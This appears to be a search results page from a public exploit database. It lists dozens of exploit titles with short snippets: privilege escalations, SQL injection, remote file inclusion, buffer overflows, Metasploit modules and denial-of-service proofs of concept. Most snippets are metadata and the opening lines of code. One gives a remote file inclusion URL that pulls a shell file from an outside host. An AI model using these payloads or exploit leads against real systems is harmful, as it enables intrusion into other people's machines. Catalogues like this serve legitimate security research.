41207 matches found
Linux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation
Linux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation / expmoosecox.c Watch a video of the exploit here: http://www.youtube.com/watch?v=jt81NvaOj5Y developed entirely by Ingo Molnar exploit writer extraordinaire! , thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :...
Maran PHP Shop - prod.php SQL Injection
Maran PHP Shop - prod.php SQL Injection Maran PHP Shop prod.php cat SQL Injection Vulnerability url: http://www.maran.pamil-visions.com/maranshop.php Author: JosS mail: sys-projectathotmaildotcom site: http://spanish-hackers.com team: Spanish Hackers Team - SHT This was written for educational...
PHP-Nuke Module PostGuestbook 0.6.1 - tpl_pgb_moddir Remote File Inclusion
PHP-Nuke Module PostGuestbook 0.6.1 - tplpgbmoddir Remote File Inclusion PostGuestbook 0.6.1tplpgbmoddirRemote File Include Expliot D.Script: http://sourceforge.net/projects/postguestbook/ Dork: "Powered by: PostGuestbook 0.6.1" Discovered by GloDM = Mahmoodali Homepage: http://www.Tryag.cc Greet...
Microsoft VSCode Python Extension - Code Execution
Microsoft VSCode Python Extension - Code Execution VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folder...
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Citrix ADC Remote Code Execution', 'Description' = %q ...
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Date: 2020-01-07 Exploit Author: Harrison Neal, PatchAdvisor Vendor Homepage: https://tomcat.apache.org/ Software Link:...
Microsoft Windows 7 (x86) - BlueKeep Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free
Microsoft Windows 7 x86 - BlueKeep Remote Desktop Protocol RDP Remote Windows Kernel Use After Free EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip import rdp import socket import binascii import time def poolsprays, crypter, payload...
LiteCart 2.1.2 - Arbitrary File Upload
LiteCart 2.1.2 - Arbitrary File Upload Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload Date: 2018-08-27 Exploit Author: Haboob Team Software Link: https://www.litecart.net/downloading?version=2.1.2 Version: 2.1.2 CVE : CVE-2018-12256 1. Description admin/vqmods.app/vqmods.inc.php in LiteCar...
XiongMai uc-httpd 1.0.0 - Buffer Overflow
XiongMai uc-httpd 1.0.0 - Buffer Overflow Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow Date: 2018-06-08 Exploit Author: Andrew Watson Software Version: XiongMai uc-httpd 1.0.0 Vendor Homepage: http://www.xiongmaitech.com/en/ Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on...
ISC BIND 9 - TKEY Remote Denial of Service (PoC)
ISC BIND 9 - TKEY Remote Denial of Service PoC !/usr/bin/env python Exploit Title: PoC for BIND9 TKEY DoS Exploit Author: elceef Software Link: https://github.com/elceef/tkeypoc/ Version: ISC BIND 9 Tested on: multiple CVE : CVE-2015-5477 import socket import sys print'CVE-2015-5477 BIND9 TKEY Po...
rConfig 3.9.4 - search.crud.php Remote Command Injection
rConfig 3.9.4 - search.crud.php Remote Command Injection Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Date: 2020-03-21 Exploit Author: Matthew Aberegg, Michael Burkey Vendor Homepage: https://www.rconfig.com Software Link:...
Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
Microtik SSH Daemon 6.44.3 - Denial of Service PoC Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Date: 2020-03-18 Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: ...
Cisco RV300 RV320 - Information Disclosure
Cisco RV300 RV320 - Information Disclosure Exploit Title: 6coRV Exploit Date: 01-26-2018 Exploit Author: Harom Ramos Horus Tested on: Cisco RV300/RV320 CVE : CVE-2019-1653 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from fakeuseragent import UserAgent d...
Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (polkit Method)
Linux Kernel 4.15.x 4.19.2 - mapwrite CAPSYSADMIN Local Privilege Escalation polkit Method !/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47167.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses polkit technique ---...
μTorrent (uTorrent) ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure
μTorrent uTorrent ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure By default, utorrent create an HTTP RPC server on port 10000 uTorrent classic or 19575 uTorrent web. There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest. T...
PHPMailer 5.2.20 SwiftMailer 5.4.5-DEV Zend Framework zend-mail 2.4.11 - AIO PwnScriptum Remote Code Execution
PHPMailer 5.2.20 SwiftMailer 5.4.5-DEV Zend Framework zend-mail 2.4.11 - AIO PwnScriptum Remote Code Execution !/usr/bin/python intro = """\03394m / / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // PHPMailer /...
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting source: https://www.securityfocus.com/bid/40230/info The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue...
ClipShare Pro 2006-2007 - chid SQL Injection
ClipShare Pro 2006-2007 - chid SQL Injection ================================================================================================================== SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM S N N N A A K K E S T E A A M M M M SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE...
Veyon 4.3.4 - VeyonService Unquoted Service Path
Veyon 4.3.4 - VeyonService Unquoted Service Path Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path Discovery by: Víctor García Discovery Date: 2020-03-23 Vendor Homepage: https://veyon.io/ Software Link:...
PHPKB Multi-Language 9 - Authenticated Directory Traversal
PHPKB Multi-Language 9 - Authenticated Directory Traversal Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation
xorg-x11-server 1.20.3 Solaris 11 - inittab Local Privilege Escalation !/bin/sh Exploit Title: xorg-x11-server A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the...
VirtualBox 5.2.6.r120293 - VM Escape
VirtualBox 5.2.6.r120293 - VM Escape Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration VBVA feature affecting Linux hosts. VBVA feature works o...
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation EDB Note Download: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip COMahawk...
rConfig 3.9 - searchColumn SQL Injection
rConfig 3.9 - searchColumn SQL Injection Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr Date: 2020-03-03 CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see al...
ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - .asx Local Stack Overflow
ASX to MP3 Converter 1.82.50 Windows 2003 x86 - .asx Local Stack Overflow / ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team holahola https://www.exploit-db.com/exploits/38382/ Winblows 2k3 / include include include int main int i; char overwriteoffset =...
GNU Bash - Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection Metasploit require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author...
PHPKB Multi-Language 9 - Authenticated Remote Code Execution
PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
Joomla! Component com_newsfeeds 1.0 - feedid SQL Injection
Joomla! Component comnewsfeeds 1.0 - feedid SQL Injection Exploit Title: Joomla! Component comnewsfeeds 1.0 - 'feedid' SQL Injection Date: 2020-03-10 Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork:...
Ricoh Printer Drivers - Local Privilege Escalation
Ricoh Printer Drivers - Local Privilege Escalation / This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites a DLL file before the library is loaded CVE-2019-19363. Written by Pentagrid AG, 2019. Cf...
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 This issue affects OpenSSH if privilege separation is disabled config option UsePrivilegeSeparation=no. While privilege separatio...
Zentrack 2.22.32.4 - index.php Remote File Inclusion
Zentrack 2.22.32.4 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote...
Wordpress Plugin Search Meter 2.13.2 - CSV injection
Wordpress Plugin Search Meter 2.13.2 - CSV injection Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Google Dork: N/A Date: 2020-03-10 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link:...
Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash
Binary File Descriptor Library libbfd - Out-of-Bounds Crash Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is tha...
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure !/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [email protected] The author disclaims copyright to this source code. import sys import struct import socket import time import select import re...
Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion
Coppermine Photo Gallery 1.2.2b Nuke Addon - Remote File Inclusion ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Coppermine Photo Gallery v1.2.2b for...
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Date: 2020-03-05 Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link:...
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection Shellshock !/usr/bin/python Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC Date: 2014-09-29 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1 Tested on: Debian, Ubuntu, Kali CVE: CVE-2014-6277,...
Tagger Luxury Edition - BBCodeFile Remote File Inclusion
Tagger Luxury Edition - BBCodeFile Remote File Inclusion Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dor...
cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)
cPanel 5.0 - Guestbook.cgi Remote Command Execution 4 source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cg...
AnyBurn 4.8 - Buffer Overflow (SEH)
AnyBurn 4.8 - Buffer Overflow SEH Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Date: 2020-03-09 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterpri...
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Date: 2020-03-11 Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8...
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Date: 2019-10-30 Exploit Author: Jacob Baines Vendor Homepage: https://mikrotik.com/ Software Link: https://mikrotik.com/download Version: 6.45.6 Stable and below or 6.44.5 Long-term and...
Dahua DVR 2.608.0000.02.608.GV00.0 - Authentication Bypass (Metasploit)
Dahua DVR 2.608.0000.02.608.GV00.0 - Authentication Bypass Metasploit Dahua DVR Authentication Bypass - CVE-2013-6117 --Summary-- Dahua web-enabled DVRs and rebranded versions do not enforce authentication on their administrative services. Zhejiang Dahua Technology Co., Ltd...
Microsoft Visual Basic 2010 Express - XML External Entity Injection
Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Author: ZwX Exploit Date: 2019-12-03 Version Software : 10.0.30319.1 RTMRel Vendor Homepage : https://www.microsoft.com/ Software Link:...
Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream
Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- 2040.5034: Access violation - code c0000005 first...
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router. Details ======= Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected...
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation
Linux Kernel 4.8.0-41-generic Ubuntu - Packet Socket Local Privilege Escalation // A proof-of-concept local root exploit for CVE-2017-7308. // Includes a SMEP & SMAP bypass. // Tested on 4.8.0-41-generic Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 // //...
RomPager 4.34 (Multiple Router Vendors) - Misfortune Cookie Authentication Bypass
RomPager 4.34 Multiple Router Vendors - Misfortune Cookie Authentication Bypass Title: Misfortune Cookie Exploit RomPager = 4.34 router authentication remover Date: 17/4/2016 CVE: CVE-2015-9222 http://mis.fortunecook.ie Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,... Vulnerable models...
QNAP Netatalk 3.1.12 - Authentication Bypass
QNAP Netatalk 3.1.12 - Authentication Bypass Exploit Title: QNAP Netatalk Authentication Bypass Date: 12/20/2018 Original Exploit Author: Jacob Baines Modifications for QNAP devices: Mati Aharoni Vendor Homepage: http://netatalk.sourceforge.net/ Software Link:...
snapd 2.37 (Ubuntu) - dirty_sock Local Privilege Escalation (2)
snapd 2.37 Ubuntu - dirtysock Local Privilege Escalation 2 !/usr/bin/env python3 """ dirtysock: Privilege Escalation in Ubuntu via snapd In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository...